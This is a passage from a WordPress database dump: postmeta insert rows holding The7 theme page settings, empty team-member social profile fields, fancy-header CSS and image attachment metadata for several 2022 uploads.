(7154,2500,'_dt_teammate_options_blogger',''),
(7155,2500,'_dt_teammate_options_soundcloud',''),
(7156,2500,'_dt_teammate_options_viber',''),
(7157,2500,'_dt_teammate_options_whatsapp',''),
(7158,2500,'_dt_teammate_options_reddit',''),
(7159,2500,'_dt_teammate_options_snapchat',''),
(7160,2500,'_dt_teammate_options_telegram',''),
(7162,2503,'_edit_lock','1665294531:1'),
(7163,2504,'_wp_attached_file','2022/10/5.jpg'),
(7164,2504,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:13:\"2022/10/5.jpg\";s:8:\"filesize\";i:33188;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4007;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7165,2503,'_thumbnail_id','2504'),
(7166,2503,'_edit_last','1'),
(7167,2503,'_dt_sidebar_position','disabled'),
(7168,2503,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7169,2503,'_dt_sidebar_hide_on_mobile','0'),
(7170,2503,'_dt_footer_show','1'),
(7171,2503,'_dt_footer_widgetarea_id','sidebar_2'),
(7172,2503,'_dt_footer_hide_on_mobile','0'),
(7173,2503,'_dt_header_title','fancy'),
(7174,2503,'_dt_header_background','normal'),
(7175,2503,'_dt_header_background_below_slideshow','disabled'),
(7176,2503,'_dt_header_transparent_bg_color_scheme','light'),
(7177,2503,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7178,2503,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7179,2503,'_dt_header_transparent_bg_color','#000000'),
(7180,2503,'_dt_header_transparent_bg_opacity','50'),
(7181,2503,'_dt_header_disabled_background','normal'),
(7182,2503,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7183,2503,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7184,2503,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7185,2503,'_dt_header_disabled_transparent_bg_color','#000000'),
(7186,2503,'_dt_header_disabled_transparent_bg_opacity','50'),
(7187,2503,'_dt_page_overrides_top_margin',''),
(7188,2503,'_dt_page_overrides_right_margin',''),
(7189,2503,'_dt_page_overrides_bottom_margin',''),
(7190,2503,'_dt_page_overrides_left_margin',''),
(7191,2503,'_dt_mobile_page_padding_top',''),
(7192,2503,'_dt_mobile_page_padding_right',''),
(7193,2503,'_dt_mobile_page_padding_bottom',''),
(7194,2503,'_dt_mobile_page_padding_left',''),
(7195,2503,'_dt_teammate_options_go_to_single','1'),
(7196,2503,'_dt_teammate_options_position',''),
(7197,2503,'_dt_teammate_options_website',''),
(7198,2503,'_dt_teammate_options_mail',''),
(7199,2503,'_dt_teammate_options_facebook',''),
(7200,2503,'_dt_teammate_options_twitter',''),
(7201,2503,'_dt_teammate_options_dribbble',''),
(7202,2503,'_dt_teammate_options_you-tube',''),
(7203,2503,'_dt_teammate_options_rss',''),
(7204,2503,'_dt_teammate_options_delicious',''),
(7205,2503,'_dt_teammate_options_flickr',''),
(7206,2503,'_dt_teammate_options_lastfm',''),
(7207,2503,'_dt_teammate_options_linkedin',''),
(7208,2503,'_dt_teammate_options_vimeo',''),
(7209,2503,'_dt_teammate_options_tumbler',''),
(7210,2503,'_dt_teammate_options_pinterest',''),
(7211,2503,'_dt_teammate_options_devian',''),
(7212,2503,'_dt_teammate_options_skype',''),
(7213,2503,'_dt_teammate_options_github',''),
(7214,2503,'_dt_teammate_options_instagram',''),
(7215,2503,'_dt_teammate_options_stumbleupon',''),
(7216,2503,'_dt_teammate_options_behance',''),
(7217,2503,'_dt_teammate_options_px-500',''),
(7218,2503,'_dt_teammate_options_tripedvisor',''),
(7219,2503,'_dt_teammate_options_vk',''),
(7220,2503,'_dt_teammate_options_foursquare',''),
(7221,2503,'_dt_teammate_options_xing',''),
(7222,2503,'_dt_teammate_options_weibo',''),
(7223,2503,'_dt_teammate_options_odnoklassniki',''),
(7224,2503,'_dt_teammate_options_research-gate',''),
(7225,2503,'_dt_teammate_options_yelp',''),
(7226,2503,'_dt_teammate_options_blogger',''),
(7227,2503,'_dt_teammate_options_soundcloud',''),
(7228,2503,'_dt_teammate_options_viber',''),
(7229,2503,'_dt_teammate_options_whatsapp',''),
(7230,2503,'_dt_teammate_options_reddit',''),
(7231,2503,'_dt_teammate_options_snapchat',''),
(7232,2503,'_dt_teammate_options_telegram',''),
(7236,2503,'_dt_fancy_header_layout_heading',''),
(7237,2503,'_dt_fancy_header_title_aligment','center'),
(7238,2503,'_dt_fancy_header_height','300'),
(7239,2503,'_dt_fancy_header_padding-top','0px'),
(7240,2503,'_dt_fancy_header_padding-bottom','0px'),
(7241,2503,'_dt_fancy_header_breadcrumbs_heading',''),
(7242,2503,'_dt_fancy_header_breadcrumbs','disabled'),
(7243,2503,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(7244,2503,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(7245,2503,'_dt_fancy_header_title_heading',''),
(7246,2503,'_dt_fancy_header_title_mode','generic'),
(7247,2503,'_dt_fancy_header_title',''),
(7248,2503,'_dt_fancy_header_title_font_size','30'),
(7249,2503,'_dt_fancy_header_title_line_height','36'),
(7250,2503,'_dt_fancy_header_text_transform','none'),
(7251,2503,'_dt_fancy_header_title_color_mode','color'),
(7252,2503,'_dt_fancy_header_title_color','#ffffff'),
(7253,2503,'_dt_fancy_header_subtitle_heading',''),
(7254,2503,'_dt_fancy_header_subtitle',''),
(7255,2503,'_dt_fancy_header_subtitle_font_size','18'),
(7256,2503,'_dt_fancy_header_subtitle_line_height','26'),
(7257,2503,'_dt_fancy_header_subtitle_text_transform','none'),
(7258,2503,'_dt_fancy_header_subtitle_color_mode','color'),
(7259,2503,'_dt_fancy_header_subtitle_color','#ffffff'),
(7260,2503,'_dt_fancy_header_bg_heading',''),
(7261,2503,'_dt_fancy_header_bg_color','#222222'),
(7262,2503,'_dt_fancy_header_bg_image_origin','custom'),
(7263,2503,'_dt_fancy_header_bg_image','a:0:{}'),
(7264,2503,'_dt_fancy_header_bg_repeat','no-repeat'),
(7265,2503,'_dt_fancy_header_bg_position_x','center'),
(7266,2503,'_dt_fancy_header_bg_position_y','center'),
(7267,2503,'_dt_fancy_header_bg_fullscreen','1'),
(7268,2503,'_dt_fancy_header_bg_overlay','0'),
(7269,2503,'_dt_fancy_header_overlay_color','#000'),
(7270,2503,'_dt_fancy_header_bg_overlay_opacity','50'),
(7271,2503,'_dt_fancy_header_scroll_effect','default'),
(7272,2503,'_dt_fancy_header_bg_parallax','0.5'),
(7273,2503,'_dt_fancy_header_responsiveness_heading',''),
(7274,2503,'_dt_fancy_header_responsiveness','enabled'),
(7275,2503,'_dt_fancy_header_responsiveness_switch','778px'),
(7276,2503,'_dt_fancy_header_responsive_height','70'),
(7277,2503,'_dt_fancy_header_responsive_font_size','30'),
(7278,2503,'_dt_fancy_header_responsive_title_line_height','38'),
(7279,2503,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(7280,2503,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(7281,2503,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(7282,2503,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(7283,2521,'_edit_lock','1670304409:1'),
(7284,2522,'_wp_attached_file','2022/10/1-3.jpg'),
(7285,2522,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:15:\"2022/10/1-3.jpg\";s:8:\"filesize\";i:55152;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"1-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6217;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7286,2521,'_thumbnail_id','2522'),
(7287,2521,'_edit_last','1'),
(7288,2521,'_dt_sidebar_position','disabled'),
(7289,2521,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7290,2521,'_dt_sidebar_hide_on_mobile','0'),
(7291,2521,'_dt_footer_show','1'),
(7292,2521,'_dt_footer_widgetarea_id','sidebar_2'),
(7293,2521,'_dt_footer_hide_on_mobile','0'),
(7294,2521,'_dt_header_title','fancy'),
(7295,2521,'_dt_header_background','normal'),
(7296,2521,'_dt_header_background_below_slideshow','disabled'),
(7297,2521,'_dt_header_transparent_bg_color_scheme','light'),
(7298,2521,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7299,2521,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7300,2521,'_dt_header_transparent_bg_color','#000000'),
(7301,2521,'_dt_header_transparent_bg_opacity','50'),
(7302,2521,'_dt_header_disabled_background','normal'),
(7303,2521,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7304,2521,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7305,2521,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7306,2521,'_dt_header_disabled_transparent_bg_color','#000000'),
(7307,2521,'_dt_header_disabled_transparent_bg_opacity','50'),
(7308,2521,'_dt_page_overrides_top_margin',''),
(7309,2521,'_dt_page_overrides_right_margin',''),
(7310,2521,'_dt_page_overrides_bottom_margin',''),
(7311,2521,'_dt_page_overrides_left_margin',''),
(7312,2521,'_dt_mobile_page_padding_top',''),
(7313,2521,'_dt_mobile_page_padding_right',''),
(7314,2521,'_dt_mobile_page_padding_bottom',''),
(7315,2521,'_dt_mobile_page_padding_left',''),
(7316,2521,'_dt_teammate_options_go_to_single','1'),
(7317,2521,'_dt_teammate_options_position',''),
(7318,2521,'_dt_teammate_options_website',''),
(7319,2521,'_dt_teammate_options_mail',''),
(7320,2521,'_dt_teammate_options_facebook',''),
(7321,2521,'_dt_teammate_options_twitter',''),
(7322,2521,'_dt_teammate_options_dribbble',''),
(7323,2521,'_dt_teammate_options_you-tube',''),
(7324,2521,'_dt_teammate_options_rss',''),
(7325,2521,'_dt_teammate_options_delicious',''),
(7326,2521,'_dt_teammate_options_flickr',''),
(7327,2521,'_dt_teammate_options_lastfm',''),
(7328,2521,'_dt_teammate_options_linkedin',''),
(7329,2521,'_dt_teammate_options_vimeo',''),
(7330,2521,'_dt_teammate_options_tumbler',''),
(7331,2521,'_dt_teammate_options_pinterest',''),
(7332,2521,'_dt_teammate_options_devian',''),
(7333,2521,'_dt_teammate_options_skype',''),
(7334,2521,'_dt_teammate_options_github',''),
(7335,2521,'_dt_teammate_options_instagram',''),
(7336,2521,'_dt_teammate_options_stumbleupon',''),
(7337,2521,'_dt_teammate_options_behance',''),
(7338,2521,'_dt_teammate_options_px-500',''),
(7339,2521,'_dt_teammate_options_tripedvisor',''),
(7340,2521,'_dt_teammate_options_vk',''),
(7341,2521,'_dt_teammate_options_foursquare',''),
(7342,2521,'_dt_teammate_options_xing',''),
(7343,2521,'_dt_teammate_options_weibo',''),
(7344,2521,'_dt_teammate_options_odnoklassniki',''),
(7345,2521,'_dt_teammate_options_research-gate',''),
(7346,2521,'_dt_teammate_options_yelp',''),
(7347,2521,'_dt_teammate_options_blogger',''),
(7348,2521,'_dt_teammate_options_soundcloud',''),
(7349,2521,'_dt_teammate_options_viber',''),
(7350,2521,'_dt_teammate_options_whatsapp',''),
(7351,2521,'_dt_teammate_options_reddit',''),
(7352,2521,'_dt_teammate_options_snapchat',''),
(7353,2521,'_dt_teammate_options_telegram',''),
(7354,2523,'_edit_lock','1670304686:1'),
(7355,2524,'_wp_attached_file','2022/10/2-1.jpg'),
(7356,2524,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:157;s:6:\"height\";i:217;s:4:\"file\";s:15:\"2022/10/2-1.jpg\";s:8:\"filesize\";i:35904;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4459;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7357,2523,'_thumbnail_id','2524'),
(7358,2523,'_edit_last','1'),
(7359,2523,'_dt_sidebar_position','disabled'),
(7360,2523,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7361,2523,'_dt_sidebar_hide_on_mobile','0'),
(7362,2523,'_dt_footer_show','1'),
(7363,2523,'_dt_footer_widgetarea_id','sidebar_2'),
(7364,2523,'_dt_footer_hide_on_mobile','0'),
(7365,2523,'_dt_header_title','fancy'),
(7366,2523,'_dt_header_background','normal'),
(7367,2523,'_dt_header_background_below_slideshow','disabled'),
(7368,2523,'_dt_header_transparent_bg_color_scheme','light'),
(7369,2523,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7370,2523,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7371,2523,'_dt_header_transparent_bg_color','#000000'),
(7372,2523,'_dt_header_transparent_bg_opacity','50'),
(7373,2523,'_dt_header_disabled_background','normal'),
(7374,2523,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7375,2523,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7376,2523,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7377,2523,'_dt_header_disabled_transparent_bg_color','#000000'),
(7378,2523,'_dt_header_disabled_transparent_bg_opacity','50'),
(7379,2523,'_dt_page_overrides_top_margin',''),
(7380,2523,'_dt_page_overrides_right_margin',''),
(7381,2523,'_dt_page_overrides_bottom_margin',''),
(7382,2523,'_dt_page_overrides_left_margin',''),
(7383,2523,'_dt_mobile_page_padding_top',''),
(7384,2523,'_dt_mobile_page_padding_right',''),
(7385,2523,'_dt_mobile_page_padding_bottom',''),
(7386,2523,'_dt_mobile_page_padding_left',''),
(7387,2523,'_dt_teammate_options_go_to_single','1'),
(7388,2523,'_dt_teammate_options_position',''),
(7389,2523,'_dt_teammate_options_website',''),
(7390,2523,'_dt_teammate_options_mail',''),
(7391,2523,'_dt_teammate_options_facebook',''),
(7392,2523,'_dt_teammate_options_twitter',''),
(7393,2523,'_dt_teammate_options_dribbble',''),
(7394,2523,'_dt_teammate_options_you-tube',''),
(7395,2523,'_dt_teammate_options_rss',''),
(7396,2523,'_dt_teammate_options_delicious',''),
(7397,2523,'_dt_teammate_options_flickr',''),
(7398,2523,'_dt_teammate_options_lastfm',''),
(7399,2523,'_dt_teammate_options_linkedin',''),
(7400,2523,'_dt_teammate_options_vimeo',''),
(7401,2523,'_dt_teammate_options_tumbler',''),
(7402,2523,'_dt_teammate_options_pinterest',''),
(7403,2523,'_dt_teammate_options_devian',''),
(7404,2523,'_dt_teammate_options_skype',''),
(7405,2523,'_dt_teammate_options_github',''),
(7406,2523,'_dt_teammate_options_instagram',''),
(7407,2523,'_dt_teammate_options_stumbleupon',''),
(7408,2523,'_dt_teammate_options_behance',''),
(7409,2523,'_dt_teammate_options_px-500',''),
(7410,2523,'_dt_teammate_options_tripedvisor',''),
(7411,2523,'_dt_teammate_options_vk',''),
(7412,2523,'_dt_teammate_options_foursquare',''),
(7413,2523,'_dt_teammate_options_xing',''),
(7414,2523,'_dt_teammate_options_weibo',''),
(7415,2523,'_dt_teammate_options_odnoklassniki',''),
(7416,2523,'_dt_teammate_options_research-gate',''),
(7417,2523,'_dt_teammate_options_yelp',''),
(7418,2523,'_dt_teammate_options_blogger',''),
(7419,2523,'_dt_teammate_options_soundcloud',''),
(7420,2523,'_dt_teammate_options_viber',''),
(7421,2523,'_dt_teammate_options_whatsapp',''),
(7422,2523,'_dt_teammate_options_reddit',''),
(7423,2523,'_dt_teammate_options_snapchat',''),
(7424,2523,'_dt_teammate_options_telegram',''),
(7425,2525,'_edit_lock','1670304742:1'),
(7426,2526,'_wp_attached_file','2022/10/3-1.jpg'),
(7427,2526,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:15:\"2022/10/3-1.jpg\";s:8:\"filesize\";i:44085;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6328;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7428,2525,'_thumbnail_id','2526'),
(7429,2525,'_edit_last','1'),
(7430,2525,'_dt_sidebar_position','disabled'),
(7431,2525,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7432,2525,'_dt_sidebar_hide_on_mobile','0'),
(7433,2525,'_dt_footer_show','1'),
(7434,2525,'_dt_footer_widgetarea_id','sidebar_2'),
(7435,2525,'_dt_footer_hide_on_mobile','0'),
(7436,2525,'_dt_header_title','fancy'),
(7437,2525,'_dt_header_background','normal'),
(7438,2525,'_dt_header_background_below_slideshow','disabled'),
(7439,2525,'_dt_header_transparent_bg_color_scheme','light'),
(7440,2525,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7441,2525,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7442,2525,'_dt_header_transparent_bg_color','#000000'),
(7443,2525,'_dt_header_transparent_bg_opacity','50'),
(7444,2525,'_dt_header_disabled_background','normal'),
(7445,2525,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7446,2525,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7447,2525,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7448,2525,'_dt_header_disabled_transparent_bg_color','#000000'),
(7449,2525,'_dt_header_disabled_transparent_bg_opacity','50'),
(7450,2525,'_dt_page_overrides_top_margin',''),
(7451,2525,'_dt_page_overrides_right_margin',''),
(7452,2525,'_dt_page_overrides_bottom_margin',''),
(7453,2525,'_dt_page_overrides_left_margin',''),
(7454,2525,'_dt_mobile_page_padding_top',''),
(7455,2525,'_dt_mobile_page_padding_right',''),
(7456,2525,'_dt_mobile_page_padding_bottom',''),
(7457,2525,'_dt_mobile_page_padding_left',''),
(7458,2525,'_dt_teammate_options_go_to_single','1'),
(7459,2525,'_dt_teammate_options_position',''),
(7460,2525,'_dt_teammate_options_website',''),
(7461,2525,'_dt_teammate_options_mail',''),
(7462,2525,'_dt_teammate_options_facebook',''),
(7463,2525,'_dt_teammate_options_twitter',''),
(7464,2525,'_dt_teammate_options_dribbble',''),
(7465,2525,'_dt_teammate_options_you-tube',''),
(7466,2525,'_dt_teammate_options_rss',''),
(7467,2525,'_dt_teammate_options_delicious',''),
(7468,2525,'_dt_teammate_options_flickr',''),
(7469,2525,'_dt_teammate_options_lastfm',''),
(7470,2525,'_dt_teammate_options_linkedin',''),
(7471,2525,'_dt_teammate_options_vimeo',''),
(7472,2525,'_dt_teammate_options_tumbler',''),
(7473,2525,'_dt_teammate_options_pinterest',''),
(7474,2525,'_dt_teammate_options_devian',''),
(7475,2525,'_dt_teammate_options_skype',''),
(7476,2525,'_dt_teammate_options_github',''),
(7477,2525,'_dt_teammate_options_instagram',''),
(7478,2525,'_dt_teammate_options_stumbleupon',''),
(7479,2525,'_dt_teammate_options_behance',''),
(7480,2525,'_dt_teammate_options_px-500',''),
(7481,2525,'_dt_teammate_options_tripedvisor',''),
(7482,2525,'_dt_teammate_options_vk',''),
(7483,2525,'_dt_teammate_options_foursquare',''),
(7484,2525,'_dt_teammate_options_xing',''),
(7485,2525,'_dt_teammate_options_weibo',''),
(7486,2525,'_dt_teammate_options_odnoklassniki',''),
(7487,2525,'_dt_teammate_options_research-gate',''),
(7488,2525,'_dt_teammate_options_yelp',''),
(7489,2525,'_dt_teammate_options_blogger',''),
(7490,2525,'_dt_teammate_options_soundcloud',''),
(7491,2525,'_dt_teammate_options_viber',''),
(7492,2525,'_dt_teammate_options_whatsapp',''),
(7493,2525,'_dt_teammate_options_reddit',''),
(7494,2525,'_dt_teammate_options_snapchat',''),
(7495,2525,'_dt_teammate_options_telegram',''),
(7496,2527,'_edit_lock','1665294557:1'),
(7497,2528,'_wp_attached_file','2022/10/1-4.jpg'),
(7498,2528,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:141;s:6:\"height\";i:189;s:4:\"file\";s:15:\"2022/10/1-4.jpg\";s:8:\"filesize\";i:36534;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"1-4-141x150.jpg\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5389;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7499,2527,'_thumbnail_id','2528'),
(7500,2527,'_edit_last','1'),
(7501,2527,'_dt_sidebar_position','disabled'),
(7502,2527,'_dt_sidebar_widgetarea_id','sidebar_1'),
(7503,2527,'_dt_sidebar_hide_on_mobile','0'),
(7504,2527,'_dt_footer_show','1'),
(7505,2527,'_dt_footer_widgetarea_id','sidebar_2'),
(7506,2527,'_dt_footer_hide_on_mobile','0'),
(7507,2527,'_dt_header_title','fancy'),
(7508,2527,'_dt_header_background','normal'),
(7509,2527,'_dt_header_background_below_slideshow','disabled'),
(7510,2527,'_dt_header_transparent_bg_color_scheme','light'),
(7511,2527,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(7512,2527,'_dt_header_transparent_top_bar_bg_opacity','25'),
(7513,2527,'_dt_header_transparent_bg_color','#000000'),
(7514,2527,'_dt_header_transparent_bg_opacity','50'),
(7515,2527,'_dt_header_disabled_background','normal'),
(7516,2527,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(7517,2527,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(7518,2527,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(7519,2527,'_dt_header_disabled_transparent_bg_color','#000000'),
(7520,2527,'_dt_header_disabled_transparent_bg_opacity','50'),
(7521,2527,'_dt_page_overrides_top_margin',''),
(7522,2527,'_dt_page_overrides_right_margin',''),
(7523,2527,'_dt_page_overrides_bottom_margin',''),
(7524,2527,'_dt_page_overrides_left_margin',''),
(7525,2527,'_dt_mobile_page_padding_top',''),
(7526,2527,'_dt_mobile_page_padding_right',''),
(7527,2527,'_dt_mobile_page_padding_bottom',''),
(7528,2527,'_dt_mobile_page_padding_left',''),
(7529,2527,'_dt_teammate_options_go_to_single','1'),
(7530,2527,'_dt_teammate_options_position',''),
(7531,2527,'_dt_teammate_options_website',''),
(7532,2527,'_dt_teammate_options_mail',''),
(7533,2527,'_dt_teammate_options_facebook',''),
(7534,2527,'_dt_teammate_options_twitter',''),
(7535,2527,'_dt_teammate_options_dribbble',''),
(7536,2527,'_dt_teammate_options_you-tube',''),
(7537,2527,'_dt_teammate_options_rss',''),
(7538,2527,'_dt_teammate_options_delicious',''),
(7539,2527,'_dt_teammate_options_flickr',''),
(7540,2527,'_dt_teammate_options_lastfm',''),
(7541,2527,'_dt_teammate_options_linkedin',''),
(7542,2527,'_dt_teammate_options_vimeo',''),
(7543,2527,'_dt_teammate_options_tumbler',''),
(7544,2527,'_dt_teammate_options_pinterest',''),
(7545,2527,'_dt_teammate_options_devian',''),
(7546,2527,'_dt_teammate_options_skype',''),
(7547,2527,'_dt_teammate_options_github',''),
(7548,2527,'_dt_teammate_options_instagram',''),
(7549,2527,'_dt_teammate_options_stumbleupon',''),
(7550,2527,'_dt_teammate_options_behance',''),
(7551,2527,'_dt_teammate_options_px-500',''),
(7552,2527,'_dt_teammate_options_tripedvisor',''),
(7553,2527,'_dt_teammate_options_vk',''),
(7554,2527,'_dt_teammate_options_foursquare',''),
(7555,2527,'_dt_teammate_options_xing',''),
(7556,2527,'_dt_teammate_options_weibo',''),
(7557,2527,'_dt_teammate_options_odnoklassniki',''),
(7558,2527,'_dt_teammate_options_research-gate',''),
(7559,2527,'_dt_teammate_options_yelp',''),
(7560,2527,'_dt_teammate_options_blogger',''),
(7561,2527,'_dt_teammate_options_soundcloud',''),
(7562,2527,'_dt_teammate_options_viber',''),
(7563,2527,'_dt_teammate_options_whatsapp',''),
(7564,2527,'_dt_teammate_options_reddit',''),
(7565,2527,'_dt_teammate_options_snapchat',''),
(7566,2527,'_dt_teammate_options_telegram',''),
(7568,2530,'_wp_attached_file','2022/10/2-2.jpg'),
(7569,2530,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:157;s:6:\"height\";i:217;s:4:\"file\";s:15:\"2022/10/2-2.jpg\";s:8:\"filesize\";i:35904;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"2-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4459;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7638,2531,'_edit_lock','1670304712:1'),
(7639,2532,'_wp_attached_file','2022/10/1-5.jpg'),
